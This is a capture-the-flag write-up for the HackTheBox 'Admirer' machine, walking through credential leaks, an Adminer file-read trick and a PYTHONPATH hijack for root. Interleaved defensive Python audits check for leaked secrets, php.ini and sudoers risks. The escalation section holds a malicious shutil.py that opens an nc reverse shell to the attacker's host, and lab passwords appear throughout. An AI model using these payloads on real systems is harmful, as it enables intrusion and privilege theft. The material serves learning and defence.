HackTheBox — Admirer

Ahmed Samir
4 min read · Sep 26, 2020

Summary

Today we will take a look at an easy Linux machine with IP 10.10.10.187.

Enumeration

Nmap

So we have 3 ports open: 21 (FTP), 22 (SSH), 80 (HTTP).

On the web page I checked the robots.txt file, and it contains:

User-agent: *
# This folder contains personal contacts and creds, so no one -not even robots- should see it — waldo
Disallow: /admin-dir

I tried to view the directory, but unfortunately I got a 403 Forbidden error, so I brute-forced the file names inside it with gobuster:

root@strike:~# gobuster dir -u http://10.10.10.187/admin-dir/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.10.187/admin-dir/
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Timeout: 10s
===============================================================
2020/06/05 23:18:48 Starting gobuster
===============================================================
/contact.txt (Status: 200)
/credentials.txt (Status: 200)
===============================================================
2020/06/05 23:22:42 Finished
===============================================================

I checked credentials.txt:

[Internal mail account]
w.cooper@admirer.htb
fgJr6q#S\W:$P

[FTP account]
ftpuser
%n?4Wz}R$tTF7

[Wordpress account]
admin
w0rdpr3ss01!

Nice! We found an FTP account: username ftpuser, with the password shown above.
After connecting to the FTP service as ftpuser, we get two files:

So I downloaded html.tar.gz and extracted it.

I found more credentials in the db_admin.php file:

<?php
$servername = "localhost";
$username = "waldo";
$password = "Wh3r3_1s_w4ld0?";

// Create connection
$conn = new mysqli($servername, $username, $password);

// Check connection
if ($conn->connect_error) {
die("Connection failed: " . $conn->connect_error);
}
echo "Connected successfully";


// TODO: Finish implementing this or find a better open source alternative
?>

Unfortunately, this page doesn't exist on the server!
After some thinking, I noticed that the machine name is very similar to the Adminer tool (a popular PHP tool for administering SQLite, MariaDB, MongoDB, MySQL, ...), so I tried it, and it works!
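The robots.txt entry and the two credential files (credentials.txt, db_admin.php) carry the same defender-side lesson: a Disallow line hides nothing from a human reading the file, and the 403 on the directory did not stop direct requests for the files inside it. The following Python script is an added example, not part of the original write-up; it audits a web root the way a pre-deployment check would, parsing robots.txt for Disallow paths that actually exist on disk and scanning every served file for credential-looking names and content. The sample web root, file names and passwords it builds are constructed for the demo, not the box's real files.

```python
import os
import re
import tempfile

# Content patterns that usually mean a plaintext credential sits in a served file:
# a PHP "$password = ..." assignment (db_admin.php) and an "[... account]" block
# listing a login/password pair (credentials.txt).
CONTENT_PATTERNS = [
    ("php-password-assignment",
     re.compile(r'\$(?:password|passwd|pass|pwd)\s*=\s*["\'][^"\']+["\']', re.I)),
    ("account-block", re.compile(r'^\[[^\]]*account[^\]]*\]', re.I | re.M)),
]
# File names that invite a direct request even when the directory itself returns 403.
NAME_PATTERN = re.compile(r'cred|passw|secret', re.I)

def parse_robots_disallow(text):
    """Disallow paths from a robots.txt body, ignoring comments and blank lines.
    A path listed here is a hint to anyone who reads the file, not an access control."""
    paths = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line or ":" not in line:
            continue
        key, value = (part.strip() for part in line.split(":", 1))
        if key.lower() == "disallow" and value:
            paths.append(value)
    return paths

def scan_for_secrets(webroot):
    """Walk the web root; return sorted (url_path, reason) pairs for files whose
    name or content looks like a credential."""
    findings = set()
    for dirpath, _dirs, files in os.walk(webroot):
        for name in files:
            full = os.path.join(dirpath, name)
            url_path = "/" + os.path.relpath(full, webroot).replace(os.sep, "/")
            if NAME_PATTERN.search(name):
                findings.add((url_path, "credentials-filename"))
            try:
                with open(full, "r", errors="replace") as fh:
                    body = fh.read()
            except OSError:
                continue
            for label, pattern in CONTENT_PATTERNS:
                if pattern.search(body):
                    findings.add((url_path, label))
    return sorted(findings)

def audit_webroot(webroot):
    """Both checks together: robots.txt-hidden paths that exist on disk, and leaked secrets."""
    hidden = []
    robots = os.path.join(webroot, "robots.txt")
    if os.path.exists(robots):
        with open(robots) as fh:
            hidden = [p for p in parse_robots_disallow(fh.read())
                      if os.path.exists(os.path.join(webroot, p.strip("/")))]
    return {"hidden_paths_present": hidden, "secret_findings": scan_for_secrets(webroot)}

def build_sample_webroot():
    """Constructed sample modelled on the layout in the write-up (not the box's real files)."""
    root = tempfile.mkdtemp(prefix="webroot_")
    os.makedirs(os.path.join(root, "admin-dir"))
    files = {
        "robots.txt": "User-agent: *\n# staff only, robots keep out\nDisallow: /admin-dir\n",
        "admin-dir/credentials.txt": "[FTP account]\nftpuser\nEXAMPLE_PASSWORD_1\n",
        "db_admin.php": '<?php\n$username = "waldo";\n$password = "EXAMPLE_PASSWORD_2";\n?>\n',
        "index.php": "<?php echo 'hello'; ?>\n",
    }
    for rel, body in files.items():
        with open(os.path.join(root, rel), "w") as fh:
            fh.write(body)
    return root

if __name__ == "__main__":
    for key, value in audit_webroot(build_sample_webroot()).items():
        print(key, value)
```

Run it against a staging copy of the document root before each deploy; anything in `secret_findings` should be moved out of the web root entirely rather than hidden behind a robots.txt entry or a directory listing denial.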

Exploitation

I looked for a CVE for Adminer version 4.6.2, and after a few seconds found CVE-2016-5734.
So I set up a MySQL server on my machine, created a database, created a table with a single column, and logged in to my database from the victim's Adminer.
Now I could read any local file!

create database exploit;
use exploit;
create table dmp(content varchar(5000));

After dumping the index.php file, I got some credentials from the database and found that one of them is waldo with the password &<h5b~yK3F#{PaPB&dA}{H>, so I tried to connect over SSH with these credentials.
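What makes the Adminer step work is that Adminer is a MySQL client: once it connects to a server the attacker controls, that server can ask the client to send any file the web server user can read (the LOAD DATA LOCAL INFILE mechanism). The mitigation therefore lives on the web host, in the PHP client setting, not in the victim's own mysqld. The Python check below is an added example, not from the original write-up; the php.ini fragments are constructed, and the `default_on` argument models the interpreter default for a missing directive (enabled before PHP 7.2.16 / 7.3.3, disabled in later releases).

```python
import re

# Constructed php.ini fragments: the weak setting beside the hardened one.
WEAK_PHP_INI = """\
[MySQLi]
; Adminer runs as a MySQL client. With this on, any server it connects to may
; request a file the web server user can read (LOAD DATA LOCAL INFILE).
mysqli.allow_local_infile = On
"""

HARDENED_PHP_INI = """\
[MySQLi]
mysqli.allow_local_infile = Off
"""

def parse_ini(text):
    """Small php.ini-style parser returning {key: value} across all sections.
    PHP ignores section headers, so they are simply skipped; ';' and '#' comments
    and quoted values are handled."""
    values = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in ";#" or line.startswith("["):
            continue
        key, sep, value = line.partition("=")
        key = key.strip().lower()
        value = value.split(";", 1)[0].strip().strip('"\'') if sep else ""
        values[key] = value
    return values

def php_truthy(value):
    """Boolean spellings php.ini accepts."""
    return value.strip().lower() in ("1", "on", "true", "yes")

def local_infile_enabled(php_ini_text, default_on=False):
    """Effective value of mysqli.allow_local_infile. default_on is the
    interpreter default when the directive is absent (assumption documented
    in the lead-in: enabled before PHP 7.2.16 / 7.3.3, disabled afterwards)."""
    values = parse_ini(php_ini_text)
    if "mysqli.allow_local_infile" not in values:
        return default_on
    return php_truthy(values["mysqli.allow_local_infile"])

def assess_adminer_host(php_ini_text, default_on=False):
    """Findings for a host serving Adminer. Note what does NOT help here:
    local_infile on the victim's own mysqld, because the file read is
    negotiated with whichever server Adminer was pointed at."""
    findings = []
    if local_infile_enabled(php_ini_text, default_on):
        findings.append("mysqli.allow_local_infile is enabled: a malicious MySQL server "
                        "reached through Adminer can read files as the web server user")
    return findings

if __name__ == "__main__":
    print("weak:", assess_adminer_host(WEAK_PHP_INI))
    print("hardened:", assess_adminer_host(HARDENED_PHP_INI))
```

Beyond the PHP directive, the practical fix is not to expose a database administration panel on a public host at all, or to pin the server it may connect to (Adminer's `adminer_object()` customisation lets you fix the credentials server-side) so that an arbitrary server can never be entered in the login form.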

Privilege Escalation

After a few seconds I noticed that waldo can execute /opt/scripts/admin_tasks.sh as root!

Take a look at the backup.py file:

I think I could change the path where Python looks for shutil, so if I change this path and create my own shutil, it will let me execute any script as root.
So I went to the tmp directory and created a Python script named shutil.py.

Python Script:

import os

# Same function name and arity backup.py calls; the body spawns the reverse shell instead.
def make_archive(a, b, c):
    os.system('nc 10.10.x.xx 1337 -e "/bin/sh"')

NOTE: don't forget to change the LHOST address!

Setup Listener

root@strike:~# nc -lnvp 1337
listening on [any] 1337 ...

Run Script:

Now we get root privileges:

root@strike:~# nc -lnvp 1337
listening on [any] 1337 ...
connect to [10.10.x.xx] from (UNKNOWN) [10.10.10.187] 52226
id
uid=0(root) gid=0(root) groups=0(root)

Grab the root flag!
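The privilege escalation works because sudo let waldo carry PYTHONPATH into a script run as root, and Python honours that variable when resolving `import shutil`. The script below is an added example (not part of the write-up) written from the defender's side: it flags sudoers rules that pass the caller's environment through (SETENV, env_keep of a search-path variable, !env_reset), checks an import path for entries an unprivileged user could write to, resolves where a module would actually be loaded from using the same finder Python itself uses, and tells whether a python command line carries -E or -I, which makes the interpreter ignore PYTHONPATH. The sudoers text is constructed; the rule shape (SETENV on /opt/scripts/admin_tasks.sh) is assumed from the behaviour described above, and the second rule's user name is made up.

```python
import os
import re
import stat
import sys
import sysconfig
import tempfile
from importlib.machinery import PathFinder

# sudoers constructs that let the caller push environment variables (PYTHONPATH
# among them) into the command run as root.
SUDOERS_ENV_RISKS = [
    ("SETENV tag", re.compile(r"\bSETENV:")),
    ("env_keep of a search-path variable",
     re.compile(r"env_keep\s*\+?=.*\b(PYTHONPATH|PERL5LIB|LD_PRELOAD|LD_LIBRARY_PATH)\b", re.I)),
    ("env_reset disabled", re.compile(r"^\s*Defaults\b.*!env_reset\b")),
]

# Constructed sample: the first rule models the condition the write-up exploits,
# the second shows the interpreter-side fix ("ops" is an invented user).
SAMPLE_SUDOERS = """\
Defaults        env_reset
waldo ALL=(ALL) SETENV: /opt/scripts/admin_tasks.sh
ops   ALL=(ALL) NOPASSWD: /usr/bin/python3 -I /opt/scripts/backup.py
"""

def sudoers_env_findings(text):
    """(line_number, risk_label, rule) for each line that lets the invoking user
    influence the environment of the privileged command."""
    findings = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        rule = raw.split("#", 1)[0].strip()
        for label, pattern in SUDOERS_ENV_RISKS:
            if rule and pattern.search(rule):
                findings.append((lineno, label, rule))
    return findings

def audit_sys_path(entries, trusted_uids=(0,)):
    """Flag import-path entries an unprivileged user could populate: the empty
    string (current directory), directories writable by group/other (a sticky
    /tmp still counts: anyone can create a file there), and directories not
    owned by a trusted uid. Missing entries are skipped."""
    findings = []
    for entry in entries:
        if entry == "":
            findings.append((entry, "current working directory is on the import path"))
            continue
        try:
            st = os.stat(entry)
        except OSError:
            continue
        if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
            findings.append((entry, "directory writable by group or other"))
        elif st.st_uid not in trusted_uids:
            findings.append((entry, "directory owned by uid %d, not a trusted uid" % st.st_uid))
    return findings

def resolve_origin(module, search_path):
    """Real path the given search path would load `module` from, without importing it."""
    spec = PathFinder.find_spec(module, search_path)
    return os.path.realpath(spec.origin) if spec and spec.origin else None

def origin_is_stdlib(origin):
    """True when a resolved origin lives inside the interpreter's stdlib directory."""
    stdlib = os.path.realpath(sysconfig.get_paths()["stdlib"])
    return origin is not None and origin.startswith(stdlib + os.sep)

def python_invocation_ignores_env(command):
    """True if a python command line carries -E (ignore PYTHON* variables) or
    -I (isolated mode, which implies -E and -s). Options after the script path
    belong to the script and are not inspected."""
    argv = command.split()
    if not argv or not os.path.basename(argv[0]).startswith("python"):
        return False
    for arg in argv[1:]:
        if not arg.startswith("-") or arg == "-":
            break
        if arg in ("-E", "-I") or (not arg.startswith("--") and ("E" in arg or "I" in arg)):
            return True
    return False

def run_demo():
    """Exercise every check on constructed input and return the results."""
    world_writable = tempfile.mkdtemp(); os.chmod(world_writable, 0o1777)
    private = tempfile.mkdtemp(); os.chmod(private, 0o755)
    shadow = tempfile.mkdtemp()   # holds a placeholder shutil.py to show shadowing
    with open(os.path.join(shadow, "shutil.py"), "w") as fh:
        fh.write("# constructed placeholder module for the demo\n")
    clean = [p for p in sys.path if p]
    flagged = [e for e, _ in audit_sys_path(["", world_writable, private],
                                            trusted_uids=(0, os.getuid()))]
    return {
        "sudoers": [(n, label) for n, label, _ in sudoers_env_findings(SAMPLE_SUDOERS)],
        "path_flags": flagged, "world_writable": world_writable, "private": private,
        "shadowed_origin_in_shadow_dir":
            resolve_origin("shutil", [shadow] + clean).startswith(os.path.realpath(shadow)),
        "clean_origin_is_stdlib": origin_is_stdlib(resolve_origin("shutil", clean)),
        "isolated_ignores_env": python_invocation_ignores_env("/usr/bin/python3 -I /opt/scripts/backup.py"),
        "plain_ignores_env": python_invocation_ignores_env("/usr/bin/python3 /opt/scripts/backup.py"),
    }

if __name__ == "__main__":
    for key, value in run_demo().items():
        print(key, value)
```

The two fixes this surfaces are complementary: drop the SETENV tag (so sudo's default env_reset strips PYTHONPATH) and invoke the script with `python3 -I`, which makes the interpreter ignore the variable even if it does arrive. `resolve_origin` is the check to run after either change to confirm that `shutil` still resolves to the stdlib copy.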

If you learned anything useful from this write-up, respect me on HackTheBox.

Thanks for your time!
